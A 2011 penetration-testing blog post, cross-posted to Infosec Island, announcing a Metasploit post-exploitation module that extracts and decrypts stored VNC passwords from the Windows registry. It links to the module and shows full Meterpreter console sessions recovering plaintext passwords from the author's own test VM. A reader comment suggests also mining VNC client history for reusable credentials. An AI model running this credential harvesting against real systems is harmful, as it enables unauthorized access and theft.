Metasploit VNC Password Extraction

Tuesday, March 22, 2011

Rob Fuller

D8853ae281be8cfdfa18ab73608e8c3f

Chris Gates wrote a blog post about the 'getvncpw' meterpreter script. I ran into the same issue on Penetration Tests in the past but didn't know much about the whacked out version of DES that RFB (the VNC protocol) was using.

Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn't get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: "That's definitely within my coding ability to contribute a patch for".

After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday. It went far and beyond just adding in a bit of code to support UltraVNC.

changelog:

  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of less than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and it's control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening
  • Reports authentication credentials found to database
  • Identifies the port that VNC is running on as well

It isn't in the metasploit trunk so until/if if gets added you can get it here:

http://www.room362.com/scripts-and-programs/metasploit/enum_vnc_pw.rb

If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways):

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SESSION       1             yes      The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE

[*] Checking UltraVNC...

[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900

[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900

[*] Checking WinVNC3_HKLM...

[*] Checking WinVNC3_HKCU...

[*] Checking WinVNC3_HKLM_Default...

[*] Checking WinVNC3_HKCU_Default...

[*] Checking WinVNC_HKLM_Default...

[*] Checking WinVNC_HKCU_Default...

[*] Checking WinVNC4_HKLM...

[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900

[*] Checking WinVNC4_HKCU...

[*] Checking RealVNC_HKLM...

[*] Checking RealVNC_HKCU...

[*] Checking TightVNC_HKLM...

[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900

[*] Checking TightVNC_HKLM_Control_pass...

[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900

[*] Post module execution completed


msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw

[*] Enumerating VNC passwords on XPBASELINE

[*] Checking UltraVNC...

[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900

[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900

[*] Checking WinVNC3_HKLM...

[*] Checking WinVNC3_HKCU...

[*] Checking WinVNC3_HKLM_Default...

[*] Checking WinVNC3_HKCU_Default...

[*] Checking WinVNC_HKLM_Default...

[*] Checking WinVNC_HKCU_Default...

[*] Checking WinVNC4_HKLM...

[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900

[*] Checking WinVNC4_HKCU...

[*] Checking RealVNC_HKLM...

[*] Checking RealVNC_HKCU...

[*] Checking TightVNC_HKLM...

[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900

[*] Checking TightVNC_HKLM_Control_pass...

[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter>

Cross-posted from Room362

Possibly Related Articles:
31462
Network->General
Passwords Hacking Penetration Testing Metasploit Meterpreter UltraVNC
Post Rating I Like this!
E376ca757c1ebdfbca96615bf71247bb
shawn merdinger Hi Rob,

Cool post and thanks for sharing!

I'm wondering if anyone has looked into pulling settings from the VNC clients that include servers the clients have previously connected to. For example, in the portableapps TightVNC viewer_settings.ini file? Given the pervasive re-use of credentials, it might be useful information.

Example from TightVNC portableapps version shows a previous connect to "my.host.org"

80000001\Software\ORL\VNCviewer\History\my.host.org:1]
use_encoding_0=D1
use_encoding_1=D1
use_encoding_2=D1
use_encoding_3=D0
use_encoding_4=D1
use_encoding_5=D1
use_encoding_6=D1
use_encoding_7=D1
use_encoding_8=D1
preferred_encoding=D7
restricted=D0
viewonly=D0
fullscreen=D0
scaling=D0
8bit=D0
shared=D1
swapmouse=D0
belldeiconify=D0
emulate3=D1
emulate3timeout=D100
emulate3fuzz=D4
disableclipboard=D0
fitwindow=D0
scale_den=D1
scale_num=D1
cursorshape=D1
noremotecursor=D0
compresslevel=D-1
quality=D6

Cheers,
--scm
1300886734
The views expressed in this post are the opinions of the Infosec Island member that posted this content. Infosec Island is not responsible for the content or messaging of this post.

Unauthorized reproduction of this article (in part or in whole) is prohibited without the express written permission of Infosec Island and the Infosec Island member that posted this content--this includes using our RSS feed for any purpose other than personal use.